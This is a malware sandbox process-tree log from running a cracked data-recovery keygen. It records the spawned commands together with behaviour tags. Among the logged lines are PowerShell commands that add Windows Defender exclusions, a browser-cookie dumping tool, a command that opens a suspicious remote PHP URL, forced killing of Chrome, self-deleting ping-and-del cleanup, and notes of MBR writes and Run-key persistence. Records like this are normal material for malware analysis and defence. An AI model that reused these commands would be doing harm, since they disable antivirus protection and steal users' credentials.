C:\Users\Admin\AppData\Local\Temp\21rb3lohyp2\app.exe"C:\Users\Admin\AppData\Local\Temp\21rb3lohyp2\app.exe" /8-2323⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Blue-Wind"24⤵
-
C:\Program Files (x86)\Blue-Wind\7za.exe"C:\Program Files (x86)\Blue-Wind\7za.exe" e -p154.61.71.13 winamp-plugins.7z24⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Blue-Wind\app.exe" -map "C:\Program Files (x86)\Blue-Wind\WinmonProcessMonitor.sys""24⤵
-
C:\Program Files (x86)\Blue-Wind\app.exe"C:\Program Files (x86)\Blue-Wind\app.exe" -map "C:\Program Files (x86)\Blue-Wind\WinmonProcessMonitor.sys"25⤵
-
C:\Program Files (x86)\Blue-Wind\7za.exe"C:\Program Files (x86)\Blue-Wind\7za.exe" e -p154.61.71.13 winamp.7z24⤵
-
C:\Program Files (x86)\Blue-Wind\app.exe"C:\Program Files (x86)\Blue-Wind\app.exe" /8-2324⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QK9QK.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-QK9QK.tmp\Delta.tmp" /SL5="$2081C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P6JAD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-P6JAD.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 86815⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7LP7P.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-7LP7P.tmp\zznote.tmp" /SL5="$50702,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-170ME.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-170ME.tmp\jg4_4jaa.exe" /silent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\hjjgaa.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
C:\Users\Admin\AppData\Local\Temp\s1hgtx0lxq5\app.exe"C:\Users\Admin\AppData\Local\Temp\s1hgtx0lxq5\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Crimson-Sky"9⤵
-
C:\Program Files (x86)\Crimson-Sky\7za.exe"C:\Program Files (x86)\Crimson-Sky\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Crimson-Sky\app.exe" -map "C:\Program Files (x86)\Crimson-Sky\WinmonProcessMonitor.sys""9⤵
-
C:\Program Files (x86)\Crimson-Sky\app.exe"C:\Program Files (x86)\Crimson-Sky\app.exe" -map "C:\Program Files (x86)\Crimson-Sky\WinmonProcessMonitor.sys"10⤵
-
C:\Program Files (x86)\Crimson-Sky\7za.exe"C:\Program Files (x86)\Crimson-Sky\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
C:\Program Files (x86)\Crimson-Sky\app.exe"C:\Program Files (x86)\Crimson-Sky\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe"C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HE8DP.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-HE8DP.tmp\IBInstaller_97039.tmp" /SL5="$10410,14441882,721408,C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe"C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\kvsrqcvcnsb\xgfilbww3ga.exe"C:\Users\Admin\AppData\Local\Temp\kvsrqcvcnsb\xgfilbww3ga.exe" 57a764d042bf88⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe"C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe" 57a764d042bf810⤵
-
C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe"C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oyljw44tzjq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oyljw44tzjq.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\psal1mdr0mx\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\psal1mdr0mx\askinstall24.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\w43zntj3k1a\2ih2gpjdgkv.exe"C:\Users\Admin\AppData\Local\Temp\w43zntj3k1a\2ih2gpjdgkv.exe" testparams8⤵
-
C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe"C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe" /VERYSILENT /p=testparams9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4OULE.tmp\5rd3pvvvm00.tmp"C:\Users\Admin\AppData\Local\Temp\is-4OULE.tmp\5rd3pvvvm00.tmp" /SL5="$A02FC,552809,216064,C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe" /VERYSILENT /p=testparams10⤵
-
C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe"C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"C:\Users\Admin\AppData\Roaming\D97A.tmp.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\DA85.tmp.exe"C:\Users\Admin\AppData\Roaming\DA85.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\DA85.tmp.exe"{path}"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"4⤵
-
C:\ProgramData\8383293.92"C:\ProgramData\8383293.92"5⤵
-
C:\ProgramData\5313006.58"C:\ProgramData\5313006.58"5⤵
-
C:\ProgramData\643491.7"C:\ProgramData\643491.7"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615303685562.exe"C:\Users\Admin\AppData\Roaming\1615303685562.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303685562.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615303690109.exe"C:\Users\Admin\AppData\Roaming\1615303690109.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303690109.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615303696450.exe"C:\Users\Admin\AppData\Roaming\1615303696450.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615303696450.txt"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 1 3.1615300310.604786d6b013f 1016⤵
-
C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HADBYKVRG2\multitimer.exe" 2 3.1615300310.604786d6b013f7⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe"C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "l1ofbjkbazu.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wbtvwrycwfq\l1ofbjkbazu.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "l1ofbjkbazu.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\u1nli0pv11a\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\u1nli0pv11a\askinstall24.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe"C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-80RSQ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-80RSQ.tmp\vpn.tmp" /SL5="$203FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4rscd3tpd51\vpn.exe" /silent /subid=4829⤵
-
C:\Users\Admin\AppData\Local\Temp\a2k4icquawl\app.exe"C:\Users\Admin\AppData\Local\Temp\a2k4icquawl\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Brook"9⤵
-
C:\Program Files (x86)\Lingering-Brook\7za.exe"C:\Program Files (x86)\Lingering-Brook\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Brook\app.exe" -map "C:\Program Files (x86)\Lingering-Brook\WinmonProcessMonitor.sys""9⤵
-
C:\Program Files (x86)\Lingering-Brook\app.exe"C:\Program Files (x86)\Lingering-Brook\app.exe" -map "C:\Program Files (x86)\Lingering-Brook\WinmonProcessMonitor.sys"10⤵
-
C:\Program Files (x86)\Lingering-Brook\7za.exe"C:\Program Files (x86)\Lingering-Brook\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
C:\Program Files (x86)\Lingering-Brook\app.exe"C:\Program Files (x86)\Lingering-Brook\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IOFHJ.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-IOFHJ.tmp\IBInstaller_97039.tmp" /SL5="$20498,14441882,721408,C:\Users\Admin\AppData\Local\Temp\creswnaouyt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-DN9AO.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\4u1k1jlszpz\ljewztvo1h5.exe"C:\Users\Admin\AppData\Local\Temp\4u1k1jlszpz\ljewztvo1h5.exe" 57a764d042bf88⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe"C:\Program Files\F2CIH8Z240\F2CIH8Z24.exe" 57a764d042bf810⤵
-
C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe"C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FBR3N.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-FBR3N.tmp\vict.tmp" /SL5="$10424,870426,780800,C:\Users\Admin\AppData\Local\Temp\gc15sfrshct\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DK981.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-DK981.tmp\wimapi.exe" 53510⤵
-
C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\h1f2oisflct\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jo0ys2wv3sd\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe"C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CF1HT.tmp\ew1lfrsdsxv.tmp"C:\Users\Admin\AppData\Local\Temp\is-CF1HT.tmp\ew1lfrsdsxv.tmp" /SL5="$10426,870426,780800,C:\Users\Admin\AppData\Local\Temp\edjwdzgufjs\ew1lfrsdsxv.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M7DVT.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-M7DVT.tmp\winlthst.exe" test1 test110⤵
-
C:\Users\Admin\AppData\Local\Temp\SmrT8fXd2.exe"C:\Users\Admin\AppData\Local\Temp\SmrT8fXd2.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\ljf3dkrxcw1\ydbe4lrucxi.exe"C:\Users\Admin\AppData\Local\Temp\ljf3dkrxcw1\ydbe4lrucxi.exe" testparams8⤵
-
C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe"C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe" /VERYSILENT /p=testparams9⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\E448.tmp.exe"C:\Users\Admin\AppData\Roaming\E448.tmp.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\E448.tmp.exe"C:\Users\Admin\AppData\Roaming\E448.tmp.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe"C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe"{path}"6⤵
-
C:\Users\Admin\AppData\Roaming\E5FE.tmp.exe"{path}"6⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\ProgramData\549377.5"C:\ProgramData\549377.5"5⤵
-
C:\ProgramData\2491929.27"C:\ProgramData\2491929.27"5⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
-
C:\ProgramData\6474090.71"C:\ProgramData\6474090.71"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 98B8836EF4E9E2D31BD8DB03CE653944 C2⤵
- Loads dropped DLL
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K83JO.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-K83JO.tmp\vpn.tmp" /SL5="$20400,15170975,270336,C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe" /silent /subid=4821⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2NR4Q.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2NR4Q.tmp\vict.tmp" /SL5="$203FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe" /VERYSILENT /id=5351⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UI7EO.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-UI7EO.tmp\wimapi.exe" 5352⤵
-
C:\Users\Admin\AppData\Local\Temp\MvSrIwB4C.exe"C:\Users\Admin\AppData\Local\Temp\MvSrIwB4C.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4TQJ5.tmp\pmemhosx4vv.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TQJ5.tmp\pmemhosx4vv.tmp" /SL5="$10412,870426,780800,C:\Users\Admin\AppData\Local\Temp\elyqtega34x\pmemhosx4vv.exe" /VERYSILENT1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A0GPO.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-A0GPO.tmp\winlthst.exe" test1 test12⤵
-
